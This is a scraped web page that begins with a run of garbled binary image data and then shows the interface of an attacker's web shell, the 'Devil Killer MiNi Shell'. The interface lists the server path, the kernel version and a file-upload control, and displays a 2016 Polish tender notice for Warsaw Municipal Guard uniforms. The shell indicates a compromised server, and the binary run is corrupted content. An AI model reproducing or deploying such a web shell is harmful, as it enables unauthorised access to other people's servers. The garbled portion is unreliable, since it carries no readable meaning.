JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160215/15383-N-2016.html

<p class="kh_header"><b>Warszawa: Dostawa elementów umundurowania dla Straży Miejskiej m. st. Warszawy.</b><br>
<b>Numer ogłoszenia: 15383 - 2016; data zamieszczenia: 15.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Straż Miejska Miasta Stołecznego Warszawy , ul. Młynarska 43/45, 01-170 Warszawa, woj. mazowieckie, tel. 22 644 15 64, faks 22 851 16 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.strazmiejska.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa elementów umundurowania dla Straży Miejskiej m. st. Warszawy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa elementów umundurowania dla Straży  
Miejskiej m. st. Warszawy.
Zamawiający dopuszcza składanie ofert częściowych, w związku z czym zamówienie zostało podzielone na siedem zadań: 
Zadanie nr 1 obejmuje dostawę: 
a)marynarek taliowanych damskich i męskich, każda w komplecie z 1 parą spodni przystosowanych do butów  z opinaczami w ilości 40 kpl;
b)marynarek taliowanych damskich i męskich w komplecie z 1 parą spodni typu bryczesy  w ilości  14  kpl.;
c) marynarek damskich i męskich w komplecie z 2 parami spodni o kroju prostym w ilości  60 kpl.;
d) spódnic w ilości 20 sztuk;
e) płaszczy wełnianych damskich i męskich w ilości 55 sztuk.
Zadanie nr 2 obejmuje dostawę: 
a) koszul białych damskich i męskich, wizytowych z długim rękawem w ilości 162 sztuki;
b) koszul białych damskich i męskich z krótkim rękawem w ilości 162 sztuki.
  
Zadanie nr 3 obejmuje dostawę  swetrów w ilości 200 sztuk.
Zadanie nr 4 obejmuje dostawę  czapek rogatywek w ilości 80 sztuk.
Zadanie nr 5 obejmuje dostawę: 
a) rękawiczek skórzanych zimowych w ilości 600 par;
b) rękawiczek skórzanych letnich w ilości 80 par.
   
Zadanie nr 6 obejmuje dostawę: 
a) pasów  głównych oficerskich skórzanych w ilości 150 sztuk;
b) pasków skórzanych do spodni w ilości 100 sztuk.
   
Zadanie nr 7 obejmuje dostawę butów oficerek z prawidłami w ilości 14 par.
W celu możliwości zweryfikowania przez Zamawiającego zgodności oferowanego przedmiotu zamówienia z wymaganiami zawartymi w niniejszej SIWZ oraz w celu oceny produktów w zadaniu nr 1, 3 oraz w zadaniu nr 4  w kryterium oceny ofert - jakość produktów, Wykonawca zobowiązany jest do dostarczenia wraz z ofertą dla wybranego zadania następujących próbek oferowanych przedmiotów zamówienia pod rygorem odrzucenia oferty:
Dla zadania nr 1 Wykonawca dostarczy wraz z ofertą następujące wzory elementów umundurowania   w dowolnym rozmiarze:
marynarkę taliowaną męską w komplecie z 1 parą spodni przystosowanych do butów z opinaczami oraz spodnie typu bryczesy, marynarkę męską w komplecie z 1 parą spodni prostych,spódnicę,płaszcz wełniany męski;

Dla zadania nr 3  Wykonawca dostarczy wraz z ofertą wzór swetra w serek 
w rozmiarze XL.
Dla zadania nr 4  Wykonawca dostarczy wraz z ofertą czapkę rogatywkę w dowolnym rozmiarze.
Zgodnie z art. 97 ust. 2 ustawy Prawo zamówień publicznych Zamawiający zwróci Wykonawcom, których oferty nie zostały wybrane, na ich wniosek, złożone przez nich próbki- wzory produktów..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 18.11.00.00-3, 18.22.22.00-3, 18.23.20.00-4, 18.21.20.00-8, 18.33.20.00-5, 18.23.53.00-8, 18.44.33.20-5, 18.42.40.00-7, 18.42.50.00-4, 18.80.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 56.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia   
nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie Zadania nr 1 zamówienia:
Zamawiający uzna ww. warunek za spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej dwie dostawy odzieży: spodni przystosowanych do butów z opinaczami, spodni typu bryczesy, spodni prostych i marynarek lub/i spódnic i marynarek  oraz płaszczy o wartości nie mniejszej niż 100 000,00  zł każda. 
Wykonawca może wykazać dwie dostawy odzieży w różnej konfiguracji: spodni, spódnic, marynarek i płaszczy wełnianych z zastrzeżeniem, że płaszcze wełniane muszą się znajdować w przynajmniej jednej dostawie.
Za dostawy Zamawiający uzna jedną zrealizowaną umowę, bez względu na to czy realizowana  ona była jedną dostawą czy dostawami sukcesywnymi;

w zakresie Zadania nr 7 zamówienia:
Zamawiający uzna ww. warunek za spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej dwie dostawy butów oficerek z prawidłami o wartości nie mniejszej niż 20 000,00  zł każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnienie warunku poprzez  złożenie oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)dokument potwierdzający, że oferta została podpisana przez osobę właściwie umocowaną, jeżeli nie wynika to z innych dokumentów załączonych do oferty; 
b)w sytuacji złożenia oferty wspólnej do oferty należy dołączyć pełnomocnictwo  zgodnie z wymogami opisanymi w Części III pkt. 4 SIWZ.
Zasady składania ofert przez Wykonawców występujących wspólnie 
w rozumieniu art. 23 ustawy Prawo zamówień publicznych:
  1)Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia publicznego mogą łącznie spełniać warunki określone w art. 22 ust. 1 ustawy Pzp.
2)Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego sam musi wykazać brak podstaw do wykluczenia z powodu niespełnienia warunków określonych w art. 24 ust. 1 oraz w art. 24 ust. 2 pkt. 5 ustawy Pzp. 
3)Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia publicznego ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć do oferty  (umocowanie może wynikać z treści umowy konsorcjum w przypadku złożenia oferty przez konsorcjum).
4)W przypadku złożenia oferty wspólnej, w formularzu oferty pełnomocnik zaznacza w czyim imieniu występuje.
5)Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie 
z pełnomocnikiem.
W sytuacji, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale     
technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków na zasadach określonych w art. 26 
ust. 2b ustawy Pzp., zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonywania zamówienia.
Dokument, z którego będzie wynikać zobowiązanie podmiotu trzeciego powinien  wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia Wykonawcy,  ubiegającemu się o zamówienie odpowiedniego zasobu, czyli wskazać jego zakres, rodzaj, czas udzielenia, a także inne istotne okoliczności, w tym wynikające ze specyfiki tego zasobu.
Z treści dokumentu musi jasno wynikać:
  -   jaki jest zakres dostępnych Wykonawcy zasobów innego podmiotu,
  -   w jaki sposób zostaną wykorzystane zasoby innego podmiotu, przez  Wykonawcę  przy wykonywaniu zamówienia,
  -   jakiego charakteru stosunki będą  łączyły Wykonawcę z innym podmiotem,
  -   jaki jest zakres i w jakim okresie inny podmiot będzie brał udział przy  
      wykonywaniu zamówienia.
Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 
ust. 2b, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.strazmiejska.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Referat Zamówień Publicznych i Zaopatrzenia, 01-163 Warszawa, 
ul. Sołtyka 8/10, pokój nr 18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2016 godzina 10:00, miejsce: Referat Zamówień Publicznych i Zaopatrzenia, 01-163 Warszawa, 
ul. Sołtyka 8/10, pokój nr 18.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PRÓBKI (WZORY) - produktów niezbędne do oceny ofert.

W celu możliwości zweryfikowania przez Zamawiającego zgodności oferowanego przedmiotu zamówienia z wymaganiami zawartymi w niniejszej SIWZ oraz w celu oceny produktów w zadaniu nr 1, 3 oraz w zadaniu nr 4  w kryterium oceny ofert - jakość produktów, Wykonawca zobowiązany jest do dostarczenia wraz z ofertą dla wybranego zadania następujących próbek oferowanych przedmiotów zamówienia pod rygorem odrzucenia oferty:
Uwaga: Dla zadania nr 1 Wykonawca dostarczy wraz z ofertą następujące wzory elementów umundurowania   w dowolnym rozmiarze:
-marynarkę taliowaną męską w komplecie z 1 parą spodni przystosowanych do butów z opinaczami oraz   
-spodnie typu bryczesy,
-marynarkę męską w komplecie z 1 parą spodni prostych,
-spódnicę.
-płaszcz wełniany męski.

Dla zadania nr 3  Wykonawca dostarczy wraz z ofertą wzór swetra w serek 
w rozmiarze XL.
Dla zadania nr 4  Wykonawca dostarczy wraz z ofertą czapkę rogatywkę w dowolnym rozmiarze.
Emblematy w przedstawionych wzorach odzieży nie muszą być tożsame
z emblematem Straży Miejskiej m. st. Warszawy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa marynarek taliowanych damskich i męskich, każda w komplecie z 1 parą spodni
przystosowanych do butów  z opinaczami, marynarek taliowanych damskich i męskich w komplecie z 1 parą spodni typu bryczesy, marynarek damskich i męskich w komplecie z 2 parami spodni o kroju prostym, spódnic, płaszczy wełnianych damskich i męskich..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa marynarek taliowanych damskich i męskich, każda w komplecie z 1 parą spodni przystosowanych do butów  z opinaczami w ilości 40 kpl;
marynarek taliowanych damskich i męskich w komplecie z 1 parą spodni typu bryczesy  w ilości  14  kpl.; marynarek damskich i męskich w komplecie z 2 parami spodni o kroju prostym w ilości 60 kpl.; spódnic w ilości 20 sztuk; płaszczy wełnianych damskich i męskich w ilości 55 sztuk.
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 6 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.11.00.00-3, 18.22.22.00-3, 18.23.20.00-4, 18.21.20.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 55</li>
<li>2. Jakość produktów - 45</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa koszul białych damskich i męskich, wizytowych z długim rękawem, koszul białych damskich i męskich z krótkim rękawem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa koszul białych damskich i męskich, wizytowych z długim rękawem w ilości 162 sztuki; koszul białych damskich i męskich z krótkim rękawem w ilości 162 sztuki.
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 7 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.11.00.00-3, 18.33.20.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa swetrów w serek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa swetrów w serek w ilości 200 sztuk.
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 8 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.11.00.00-3, 18.23.53.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość produktów - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa czapek rogatywek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa czapek rogatywek w ilości 80 sztuk.
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 9 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.11.00.00-3, 18.44.33.20-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 55</li>
<li>2. Jakość produktów - 45</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa rękawiczek skórzanych zimowych oraz rękawiczek skórzanych letnich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa rękawiczek skórzanych zimowych w ilości 600 par oraz rękawiczek skórzanych letnich w ilości 80 par.
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 10 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.11.00.00-3, 18.42.40.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa pasów  głównych oficerskich skórzanych oraz pasków skórzanych do spodni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa pasów  głównych oficerskich skórzanych w ilości 150 sztuk oraz
pasków skórzanych do spodni w ilości 100 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.11.00.00-3, 18.42.50.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa butów oficerek z prawidłami..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa butów oficerek z prawidłami w ilości 14 par - kolor czarny, skóra cielęca.  
Buty oficerki muszą być wykonane zgodnie z Wojskową Dokumentacją Techniczno- Technologiczną - wzór KRWP 907A/MON ( Rozporządzeniem Ministra Obrony Narodowej z dnia 31.10.2014 r.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.80.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
